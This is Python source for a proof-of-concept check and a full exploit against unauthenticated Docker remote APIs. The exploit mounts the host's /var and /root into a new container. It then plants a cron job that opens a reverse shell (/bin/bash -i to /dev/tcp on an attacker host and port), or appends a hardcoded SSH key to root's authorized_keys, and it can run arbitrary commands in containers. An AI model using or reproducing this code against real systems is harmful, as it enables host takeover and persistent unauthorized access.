1 #POC 2 3 #-*-coding:utf-8-*- 4 5 import requests 6 7 def verify(protocol,ip,port): 8 url = protocol+'://'+ip+':'+str(port) 9 print('testing if docker remote api unauth access vul') 10 newurl = url + '/version' 11 try: 12 response = requests.get(newurl,timeout=5,verify=False) 13 if 'ApiVersion' in response.text: 14 msg = 'There is a docker remote api unauth access vul in url:' + newurl + ' .' 15 print(msg) 16 return True, url,msg 17 else: 18 pass 19 except Exception as e: 20 msg = str(e) 21 return False,url,msg 22 msg = 'There is no docker remote api unauth access vul' 23 return False, url, msg 24 25 26 #EXP 27 #-*- coding:utf-8 -*- 28 import urllib2 29 import json 30 import sys 31 import getopt 32 from docker import Client 33 34 def http_get(url): 35 response = urllib2.urlopen(url) 36 return response.read() 37 38 def http_post(url, values): 39 jdata = values 40 send_headers = { 41 'Content-Type':'application/json' 42 } 43 req = urllib2.Request(url, data=jdata,headers=send_headers) 44 response = urllib2.urlopen(req) 45 return response.read() 46 47 def isset(v): 48 try : 49 type(eval(v)) 50 except: 51 return 0 52 else: 53 return 1 54 55 def printport(portsList, name): 56 if isset("portsList['IP']") == 0: 57 portsList['IP']="*" 58 printport(portsList,name) 59 elif isset("portsList['Type']") == 0: 60 portsList['Type']="*" 61 printport(portsList,name) 62 elif isset("portsList['PublicPort']") == 0: 63 portsList['PublicPort']="*" 64 printport(portsList,name) 65 elif isset("portsList['PrivatePort']") == 0: 66 portsList['PrivatePort']="*" 67 printport(portsList,name) 68 else: 69 print "[-]"+name+"[+]"+portsList['Type']+"[-]"+portsList['IP']+":"+str(portsList['PrivatePort'])+" --> "+host+":"+str(portsList['PublicPort']) 70 71 def createClient(host,port,version): 72 clientApiVersion = getversion(host,port,version) 73 print "[-]ClientApiVersion:"+clientApiVersion 74 cli = Client(base_url='tcp://'+host+':'+port,version=clientApiVersion) 75 return cli 76 77 def getversion(host,port,version): 78 url = "http://"+host+":"+port+"/version" 79 ret = json.loads(http_get(url)) 80 if version != '': 81 clientApiVersion = version 82 else: 83 clientApiVersion = ret['ApiVersion'] 84 return clientApiVersion 85 86 def printContainer(host,port,version,allContainer): 87 cli = createClient(host,port,version) 88 if allContainer == 1: 89 ret = cli.containers(all=True) 90 else: 91 ret = cli.containers() 92 for info in ret: 93 print "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]" 94 print "[-] id: "+info['Id'] 95 print "[-] Names: "+info['Names'][0] 96 print "[-] Image: "+info['Image'] 97 print "[-] Status: "+info['Status'] 98 print "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]" 99 100 if __name__ == "__main__": 101 opts, args = getopt.getopt(sys.argv[1:], "v:kauVCcsLli:e:h:p:H:P:I:") 102 key = 0 103 version ='' 104 payload ='' 105 sshkey = 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCoecC7vmWn4s2y4T+Pc3bJ0owDYWzGIBTCWWonN4qMTCbe66hKopgtUuHC1y5H3HFQ0qsni0vFAGSoO4TLiIpvHUXbf9Wi9vR2q4oYphH9Kgsd3cVXsHUFcgybwdk5DCXpmoSJTlEoOrtWajYdyuALMy+CqpkwWDj+uTz+9/2P3T0Nh5F+U+UZOgSqIi5xQfUGJKGoFGXwvpqEL6UnGG4bbgGxVa5mJZVH0cxwKK6w7luezkcRVBEJ1SZAkjZOmZojyJbYQolItcBNBsXQ+cakjg3DeU69wrDiBdP+k2i2k3uzhJqJXfxLdxUZfjgXHwSOzDb2D5+841trASAwZAy1Gq4uwkbmwupe/qTPK2R31d5h4Jqx4N19eUjT8GkkDj+mnJTwYyOPJH/ghEvn4UfNOtohM2lZPbskvvskn82g0WzYJ5JnQaKfup1IYLTraBbJ5UdVYsCfG5ddRZF4xMab2ZDgcdqyISJxHPK9/P7w7mmgSut1nK5R1+HLSl/xDAPcoVd0H3ePqxN9ZD0BoMjY8fPxKAQR+bB5M05iDIIwUxhj2NQvCpwxxGwJXUSf13zirXRZhkZGnWrkNrzqHzpLZqoEBCEORErmFAvsI8yIBvThSylReiwhAWkdL7ONQ4dd7UgsQfY/0MMfxd8/V+041I1sIVUVBnHYUUwqE0eZ9Q== wanniba@wanniba.com' 106 for op, value in opts: 107 if op =="-l": 108 imagesList = 1 109 elif op == "-i": 110 imageName = value 111 elif op == "-e": 112 dataExec = value 113 elif op == "-h": 114 host = value 115 elif op =='-p': 116 port = value 117 elif op == '-L': 118 portList = 1 119 elif op == '-H': 120 lhsot = value 121 elif op == '-P': 122 lport = value 123 elif op =='-C': 124 createContainer = 1 125 elif op == '-v': 126 version = value 127 elif op == '-V': 128 version = 1 129 elif op == '-c': 130 closeContainer = 1 131 elif op == '-I': 132 imageId = value 133 elif op == '-a': 134 allContainer = 1 135 elif op == '-s': 136 startContainer = 1 137 elif op == '-k': 138 key = 1 139 elif op == '-u': 140 isUbuntu = 1 141 142 if isset('lhsot') and isset('lport'): 143 if isset('isUbuntu'): 144 payload = '/bin/bash -c "echo \\\"*/1 * * * * /bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\" >> /tmp/spool/cron/crontabs/root"' #chmod 600 145 else: 146 payload = '/bin/bash -c "echo \\\"*/1 * * * * /bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\" >> /tmp/spool/cron/root"' #centos,redhat and so on 147 print "[-]Paylaod: "+payload 148 if sshkey !='' and key == 1: 149 payload = '/bin/bash -c "echo \\\"'+sshkey+'\\\" >> /tmp1/.ssh/authorized_keys"' 150 print "[-]Paylaod: "+payload 151 if isset('host') and isset('port'): 152 if isset('version') and version == 1: 153 url = "http://"+host+":"+port+"/version" 154 ret = json.loads(http_get(url)) 155 print "[-] ApiVersion: "+ret['ApiVersion'] 156 elif isset('imagesList'): 157 url = "http://"+host+":"+port+"/images/json" 158 ret = json.loads(http_get(url)) 159 for info in ret: 160 print "RepoTags: "+info['RepoTags'][0] 161 elif isset('createContainer') and isset('imageName'): 162 cli = createClient(host,port,version) 163 container = cli.create_container(image=imageName, command='/bin/bash', tty=True, volumes=['/tmp','/tmp1'], host_config=cli.create_host_config(binds=['/var:/tmp:rw','/root:/tmp1:rw'])) 164 print "[-]Container ID:"+container['Id'] 165 print "[-]Warning:"+str(container['Warnings']) 166 response = cli.start(container=container.get('Id')) 167 if isset('isUbuntu'): 168 cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload)) 169 print "[-]create crontabs ......" 170 cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd='chmod 600 /tmp/spool/cron/crontabs/root')) 171 print "[-]chmod 600 ......" 172 else: 173 print cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload)) 174 print "[-]create crontabs ......" 175 elif isset('closeContainer') and isset('imageId'): 176 cli = createClient(host,port,version) 177 cli.stop(container=imageId) 178 cli.remove_container(container=imageId) 179 elif isset('startContainer') and isset('imageId'): 180 cli = createClient(host,port,version) 181 cli.start(container=imageId) 182 elif isset('dataExec') and isset('imageId'): 183 cli = createClient(host,port,version) 184 print "[-]Command:"+dataExec 185 print cli.exec_start(exec_id=cli.exec_create(container=imageId, cmd=dataExec)) 186 elif isset('portList'): 187 url = "http://"+host+":"+port+"/containers/json" 188 ret = json.loads(http_get(url)) 189 for pl in ret: 190 if isset("pl['Names'][0]"): 191 name = pl['Names'][0] 192 else: 193 name = '*' 194 for portsList in pl['Ports']: 195 printport(portsList, name) 196 else: 197 if isset('allContainer'): 198 printContainer(host,port,version,allContainer) 199 else: 200 printContainer(host,port,version,0)